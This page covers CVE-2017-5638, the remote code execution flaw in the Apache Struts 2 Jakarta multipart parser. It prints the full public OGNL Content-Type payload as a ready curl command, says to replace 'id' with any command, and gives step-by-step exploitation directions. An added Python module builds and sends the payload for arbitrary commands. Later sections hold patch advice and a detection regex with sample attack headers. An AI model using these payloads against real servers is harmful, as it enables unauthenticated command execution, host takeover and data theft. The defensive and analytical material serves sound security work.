CVE-2017-5638 (Apache advisory S2-045) is a critical remote code execution flaw in Apache Struts 2 caused by the error handling of the Jakarta Multipart parser, the default file-upload parser. The Struts dispatcher hands any request whose `Content-Type` header contains the string `multipart/form-data` to that parser, whatever action is being called, so the bug is reachable on every action of a vulnerable application, not only on upload endpoints. Normally the header names the MIME type of the request body. If the value cannot be parsed as a valid multipart content type, the parser builds an error message that embeds the raw header value, and that message is then passed through Struts' localized-text lookup, which evaluates OGNL (Object-Graph Navigation Language) expressions found in it. OGNL can call arbitrary Java methods, so an attacker who places a `%{...}` expression in the header gets it evaluated instead of treated as text. The public payload replaces the OGNL member-access policy with the permissive default, starts a `ProcessBuilder` with a shell command and copies its output into the HTTP response, giving command execution with the privileges of the servlet container process. No authentication and no real file upload are required.
Platform: Apache Struts 2
Version: 2.3.5 – 2.3.31, 2.5 – 2.5.10
Vulnerability : Remote Code Execution
Severity: Critical
Date: 2017-03-07
Patch: available (fixed in Struts 2.3.32 and 2.5.10.1)
What Undercode Say:
`curl -H "Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" http://target-host.com/struts2-showcase/fileupload/doUpload.action`
Every OGNL variable carries a `#` prefix (`#_`, `#dm`, `#cmd`, ...); the value must use straight quotes, and the leading `'multipart/form-data'` literal is what routes the request to the vulnerable parser. Replace `id` with any command; its output (stderr merged into stdout) comes back in the response body.
How Exploit:
Craft a `Content-Type` header whose value contains the literal `multipart/form-data` (so the dispatcher routes the request to the Jakarta parser) followed by an OGNL expression wrapped in `%{...}`.
Send it to any action of a vulnerable Struts application; the method and body do not matter, and `fileupload/doUpload.action` in the example is just one reachable action.
The parser fails on the value, embeds it in its error message, and the message is evaluated as OGNL.
The expression lifts the OGNL member-access restrictions, spawns a shell through `ProcessBuilder` and streams the command output back in the HTTP response.
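The procedure above, as an added example that is not part of the original post: the OGNL body is the public PoC from the curl command, split into clauses so that only the command varies, plus a raw-request renderer for replay tools and a sender built on `http.client`. `target-host.example`, port 8080 and the showcase path are placeholders, not a real target; the request uses GET like the page's curl does.

```python
"""Build (and optionally send) the CVE-2017-5638 Content-Type payload.

Added example; not from the original post. The OGNL clauses are the public
PoC shown above. TARGET_HOST / TARGET_PATH are placeholders, not a real host.
"""
import http.client

# Placeholders: replace with a host you are authorised to test.
TARGET_HOST = "target-host.example"
TARGET_PATH = "/struts2-showcase/fileupload/doUpload.action"


def is_safe_command(cmd: str) -> bool:
    """Reject commands that would break the OGNL literal or the HTTP header.

    A single quote would terminate the OGNL string literal and CR/LF would
    split the header line, so both are refused rather than escaped.
    """
    return "'" not in cmd and "\r" not in cmd and "\n" not in cmd


def build_payload(cmd: str) -> str:
    """Return the Content-Type value that runs `cmd` on a vulnerable server."""
    if not is_safe_command(cmd):
        raise ValueError("command must not contain quotes or line breaks")
    clauses = [
        # The literal 'multipart/form-data' makes the dispatcher hand the request
        # to the Jakarta multipart parser; everything else is OGNL.
        "(#_='multipart/form-data')",
        # Swap in the permissive member-access policy so static methods and
        # arbitrary classes can be reached from the expression.
        "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)",
        "(#_memberAccess?(#_memberAccess=#dm):("
        "(#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
        "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
        "(#ognlUtil.getExcludedPackageNames().clear())."
        "(#ognlUtil.getExcludedClasses().clear())."
        "(#context.setMemberAccess(#dm))))",
        # The command, chosen per platform, run via ProcessBuilder with stderr merged.
        "(#cmd='" + cmd + "')",
        "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))",
        "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))",
        "(#p=new java.lang.ProcessBuilder(#cmds))",
        "(#p.redirectErrorStream(true))",
        "(#process=#p.start())",
        # Copy the process output straight into the HTTP response body.
        "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))",
        "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))",
        "(#ros.flush())",
    ]
    return "%{" + ".".join(clauses) + "}"


def build_raw_request(host: str, path: str, cmd: str) -> bytes:
    """Render the full HTTP/1.1 request as bytes (for replay tools or logging)."""
    lines = [
        f"GET {path} HTTP/1.1",
        f"Host: {host}",
        f"Content-Type: {build_payload(cmd)}",
        "Connection: close",
        "",
        "",
    ]
    return "\r\n".join(lines).encode("ascii")


def send_probe(host: str, path: str, cmd: str, port: int = 8080, timeout: float = 10.0):
    """Send the request and return (status, body). Needs network access and authorisation."""
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("GET", path, headers={"Content-Type": build_payload(cmd)})
        resp = conn.getresponse()
        return resp.status, resp.read()
    finally:
        conn.close()


if __name__ == "__main__":
    # Offline: print the request that would be sent, without touching the network.
    print(build_raw_request(TARGET_HOST, TARGET_PATH, "id").decode("ascii"))
```

Running the module prints the exact request bytes without sending anything; `send_probe` is the only function that opens a connection. On a patched server the response is the action's normal output and the header value is simply ignored; on a vulnerable one the body is the command output.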
Protection from this CVE
Apply the vendor patch: the fix (S2-045) shipped in Struts 2.3.32 and 2.5.10.1, which no longer put the raw header value into the evaluated error message.
Upgrade every copy of the framework, including Struts jars bundled inside application WARs; an unpatched embedded copy stays vulnerable regardless of what the container runs.
Validate input at the edge: the vendor workaround is a servlet filter that rejects any request whose `Content-Type` is not a well-formed media type; the same check belongs in a reverse proxy or gateway.
Deploy WAF rules that drop header values containing `%{`, `${`, `#_memberAccess`, `@ognl.` or `ProcessBuilder`, keeping in mind that signature rules only catch known payload shapes and do not replace the patch.
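The validation and WAF points above in one place, as an added example that is not the page's code or the Struts project's own filter: a strict media-type grammar check (RFC 7231 syntax, so anything the Jakarta parser would choke on is rejected before it reaches Struts) combined with a marker check for the OGNL constructs every variant of the public payload needs. The sample header values are constructed for this example.

```python
"""Strict Content-Type validation for a Struts front door (WAF rule or servlet-filter logic).

Added example, not from the original post or the Struts project. Two checks:
a grammar check (media-type syntax) and an OGNL-marker check. The sample
header values below are constructed for this example.
"""
import re

# RFC 7230 token characters; '{', '(', ')', '=', '@' and ',' are deliberately absent,
# so any OGNL syntax outside a quoted-string breaks the grammar.
TOKEN = r"[!#$%&'*+\-.^_`|~0-9A-Za-z]+"
QUOTED_STRING = r'"(?:[^"\\]|\\.)*"'
PARAMETER = rf";\s*{TOKEN}=(?:{TOKEN}|{QUOTED_STRING})"
MEDIA_TYPE_RE = re.compile(rf"^\s*{TOKEN}/{TOKEN}\s*(?:{PARAMETER}\s*)*$")

# Substrings that have no business in a media type but appear in every
# CVE-2017-5638 payload derived from the public PoC (also catches them inside
# a quoted-string, which the grammar alone would accept).
OGNL_MARKERS_RE = re.compile(
    r"%\{|\$\{|#_memberAccess|@ognl\.|OgnlContext|java\.lang\.|ProcessBuilder"
)


def classify_content_type(value: str) -> str:
    """Return 'ognl' for an injection attempt, 'malformed' for anything that is
    not a syntactically valid media type, and 'ok' otherwise."""
    if OGNL_MARKERS_RE.search(value):
        return "ognl"
    if not MEDIA_TYPE_RE.match(value):
        return "malformed"
    return "ok"


def should_block(value: str) -> bool:
    """Block policy: only well-formed, marker-free media types reach the application."""
    return classify_content_type(value) != "ok"


# Constructed sample values: two legitimate uploads, one plain form post,
# the page's PoC shape, a payload hidden behind a valid-looking prefix,
# and a merely broken header that the vulnerable parser would also reject.
SAMPLE_HEADERS = [
    "multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW",
    'multipart/form-data; boundary="simple boundary"',
    "application/x-www-form-urlencoded",
    "%{(#_='multipart/form-data').(#cmd='id').(#p=new java.lang.ProcessBuilder({'/bin/bash','-c',#cmd}))}",
    "multipart/form-data; boundary=x ${#_memberAccess}",
    "multipart/form-data; boundary=",
]


def scan_headers(values):
    """Classify each value; returns [(value, verdict), ...]."""
    return [(v, classify_content_type(v)) for v in values]


if __name__ == "__main__":
    for value, verdict in scan_headers(SAMPLE_HEADERS):
        print(f"{verdict:9s} {value}")
```

The grammar check is the durable part: it rejects the whole class of "not a media type" values, including payload variants the marker list has never seen, while the markers give a clear signal for alerting. Apply the same logic to any other header a multipart parser reads, and log the blocked value so detection teams can match it against the access log.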
Impact:
Remote code execution as the servlet container account (typically the user running Tomcat, JBoss or a similar container), with no authentication required.
Complete compromise of every application hosted in that container, and of the host itself wherever the container account can escalate privileges.
Data breach potential: database credentials in application configuration and any data the application can reach are exposed.
Service disruption, since the attacker can stop the container, corrupt deployments or plant persistent backdoors.
Sources:
nvd.nist.gov (CVE-2017-5638); Apache Struts security bulletin S2-045

